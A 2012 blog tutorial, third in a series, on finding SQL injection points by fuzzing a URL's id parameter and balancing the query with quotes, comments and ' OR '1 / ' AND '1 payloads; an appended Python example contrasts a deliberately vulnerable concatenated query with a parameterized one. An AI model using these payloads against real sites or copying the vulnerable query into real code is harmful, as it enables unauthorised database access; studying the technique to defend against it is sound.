Wednesday, June 6, 2012

SQL Injecting Parameters-3

Continuing our journey of identifying injection points, let's head towards another URL and try fuzzing it.

You might wonder why I am not proceeding past this point and keep dwelling on identifying MySQL errors. Identifying the injection field is the most important step. My posts are not about dorks, where you pick up some random URLs and fuzz them. At any given point, if you are handed a website, you should have the capability to find and identify the injection field before any attack is possible.

So, once again, the company's last developer was fired because the database was successfully hacked. A new developer comes in and rewrites the engine.

Once again our aim is to understand how he coded it.


We have the URL:

http://www.example.com/index.php?id=1

So our fuzzing starts:

http://www.example.com/index.php?id=11111111111111111 >> Blank Page

http://www.example.com/index.php?id=foooo >> Blank Page

http://www.example.com/index.php?id=1c >> Blank Page

http://www.example.com/index.php?id=c1 >> Blank Page

http://www.example.com/index.php?id=1'

Whoops, we broke it: we got an SQL error. So our first task is done. Now for the second part: we will try to balance the query so that we get our injection field.

This is one type of engine where we find that we cannot use comments to balance the URL.

Here is a new thing that we will try.

By now you should have noticed that when an input creates a MySQL error, we don't remove that input. We keep it in place and try to balance around it, so that the sequence-breaking part stays there and we fix the rest, for example by commenting out what follows.

http://www.example.com/index.php?id=1'

In SQL terms,

SELECT * FROM Table
WHERE id = _______;

http://www.example.com/index.php?id='    1'    '

Notice that here the single quotes are not balanced, which is what gave the error.

Let's say we tried:

http://www.example.com/index.php?id = '   1' --+ '

By using the comment (--+) we tell the database: "anything you see after me, ignore it." So the last quote gets ignored once the query reaches the database, and any valid SQL placed between 1' ______ --+ gets executed.

Let's assume that in this case the method didn't work, and we are not able to balance the URL with a comment.

Now let's do something else:

http://www.example.com/index.php?id= '   1' OR '1   '

It gets balanced, because the quotes now pair up, and the OR logic says: execute either the first part or the second part.

SELECT * FROM Table
WHERE id = '1' OR '1';

The first '1' selects the record with id=1, and the second part, OR '1', is a TRUE statement.

Let's now use the AND statement:

http://www.example.com/index.php?id = '  1' AND '1  '

Once again we get a valid page.

http://www.example.com/index.php?id= '  2' AND '1  '

We get the next record, and so on.

So you must remember this way of fuzzing a URL when the earlier methods don't work.

So any valid query can go between '  2' ________ AND '1  '

AND and OR are there to balance. We have balanced the right side; now we insert SQL commands on the left side, and the queries will get executed.

Conclusion: we used ' AND ' 1

http://www.example.com/index.php?id  = 1

http://www.example.com/index.php?id  = 1 ' AND ' 1
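To show why the ' AND ' 1 trick balances and, more importantly, why it stops working once the parameter is bound instead of pasted into the query, here is an added example (not code from the original post). It uses an in-memory SQLite table constructed to stand in for the post's "Table"; the engine's real query is an assumption modelled on the SELECT shown above.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the post's Table (id column)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(1, "first"), (2, "second"), (3, "third")],
    )
    return conn


def lookup_vulnerable(conn, id_param):
    """The engine as the post describes it: the raw parameter is pasted
    between single quotes, so a quote in the input closes the string early.
    Returns the rows, or None when the database rejects the broken query
    (the 'SQL error' stage of the fuzzing above)."""
    sql = f"SELECT id, title FROM posts WHERE id = '{id_param}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def lookup_parameterized(conn, id_param):
    """Same lookup with a bound parameter: the whole input is one literal
    value, so quotes and AND/OR inside it never reach the SQL parser."""
    sql = "SELECT id, title FROM posts WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ["1", "1'", "1' OR '1", "1' AND '1", "2' AND '1"]:
        print(f"{payload!r:14} vulnerable: {lookup_vulnerable(db, payload)}")
        print(f"{'':14} bound:      {lookup_parameterized(db, payload)}")
```

In the vulnerable version the unbalanced 1' is a syntax error, 1' OR '1 returns every row, and 2' AND '1 returns record 2, exactly the behaviour the fuzzing sequence above relies on; with a bound parameter every one of those inputs simply matches nothing.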

Thank You!
